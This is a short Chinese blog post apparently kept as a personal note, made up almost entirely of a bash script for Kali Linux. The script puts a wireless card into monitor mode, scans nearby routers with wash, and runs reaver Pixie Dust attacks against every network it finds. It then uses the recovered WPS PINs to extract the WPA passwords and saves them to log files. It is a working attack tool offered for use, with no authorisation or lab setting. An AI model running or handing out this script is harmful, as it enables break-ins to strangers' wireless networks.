kali-通过获取路由器pin码套取无线网络密码shell脚本

直接上脚本吧, 我做个笔记。

#*************************************************************************
#         > File Name: wifi.sh
#         > Author: chenglee
#         > Main : chengkenlee@sina.com
#         > Blog : http://www.cnblogs.com/chenglee/
#         > Created Time : Tue 26 Mar 2019 09:30:16 PM CST
#*************************************************************************
#!/bin/bash

wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`

function Wwash(){
    echo "判断网卡是否以挂载..."
    if [ -z "${wlanname}" ];then
        echo "网卡没挂载, 请先手动挂载网卡"
        exit;
    else
        echo "网卡已挂载,判断是否已启动监听模式"
        #airmon-ng start ${wlanname}
        wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`
        string="mon"
        if [[ $wlanname =~ $string ]];then
            echo "监听模式正常, 开始扫描附近无线网络..."
            nohup wash -i ${wlanname} > logs/file 2>&1 &
        else
            echo "监听模式异常, 准备重启监听模式"
            airmon-ng stop ${wlanname}
            airmon-ng start ${wlanname}
            echo "检查网卡监听模式状态"
            if [[ $wlanname =~ $string ]];then
                echo "监听模式正常, 开始扫描附近无线网络..."
                nohup wash -i ${wlanname} > logs/file 2>&1 &
            else
                echo "定点异常,请插拔网卡后继续运行此脚本"
                exit;
            fi
        fi
    fi
}
function file(){
    sleep 5;
    num=`cat -n logs/file | grep BSSID | awk -F ' ' '{print$1}'`
    number=`expr ${num} + 2`
    nullnum=`sed -n ''"$number"',$p' logs/file | awk '/^$/{print NR}' | head -n 1`
    if [ "$nullnum" =  "" ];then
        sed -n ''"$number"',$p' logs/file | awk -F ' ' '{print$1,$2}' > logs/file1
        cat logs/file1 | awk -F ' ' '{print$1}' > logs/mac
        cat logs/file1 | awk -F ' ' '{print$2}' > logs/ch
    else
        sed -n ''"$number"',$p' logs/file | awk -F ' ' '{print$1,$2}' > logs/file1
        nullnu=`expr ${nullnum} - 1`
        sed -n '1,'"$nullnu"'p' logs/file1 > logs/file2
        cat logs/file2 | awk -F ' ' '{print$1}' > logs/mac
        cat logs/file2 | awk -F ' ' '{print$2}' > logs/ch
    fi
}
function Rreaver(){
    wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`
    exec 3<"logs/mac"
    exec 4<"logs/ch"
    while read line1<&3 && read line2<&4
    do
        echo "后台分析物理地址为:${line1},信道为:${line2}的无线网络数据, 请稍后..."
        nohup reaver -i ${wlanname} -b ${line1} -c ${line2} -vv -K 0 >> logs/${line1}.logs 2>&1 &
    done
}
function analyse_PIN(){
    lsatstring="logs"
    exec 5<"logs/mac"
    while read line3<&5
    do
        WPA_PIN=`cat logs/${line3}.${lsatstring} | grep WPA`
        if [ "$WPA_PIN" =  "" ];then
            echo "${line3}-PIN码获取不到, 继续判断..."
        else
            echo "${line3}-PIN码获取成功!!PIN码:${WPA_PIN}"
            echo "${line3}" >> logs/pin_mac 2>&1 &
            echo "${WPA_PIN}" | awk -F ':' '{print$NF}' | sed 's/ //g' >> logs/pin_pin 2>&1 &
        fi
    done
}
function Ppin(){
    wlanname=`ifconfig | grep wlan | awk -F ':' '{print$1}'`
    exec 6<"logs/pin_mac"
    exec 7<"logs/pin_pin"
    while read line4<&6 && read line5<&7
    do
        echo "开始通过(路由器):${line4},pin码:${line5},套取密码..."
        nohup reaver -i ${wlanname} -b ${line4} -p ${line5} >> logs/${line5}.logs 2>&1 &
    done
}
function pass(){
    lsatstring="logs"
    exec 8<"logs/pin_pin"
    while read line6<&8
    do
        PassWord=`cat logs/${line6}.${lsatstring} | grep PSK`
        if [ "$PassWord" =  "" ];then
            echo "PIN码为:${line6},密码获取失败, 继续获取..."
        else
            echo "PIN码为:${line6},密码获取成功,请前行 logs/${line6}.${lsatstring}文件查看相关 SSID,PASS等信息"
        fi
    done
}
function logs(){
    if [ -d "logs" ];then
        echo ""
        Wwash
        sleep 10;
        file
    else
        echo ""
        mkdir logs
        Wwash
        sleep 10;
        file
    fi
}
function main(){
    #logs
    #file
###############多重循环暴力区###############    
    #Rreaver
    #analyse_PIN
    #Ppin
    #pass
###############多重循环暴力区###############
}
main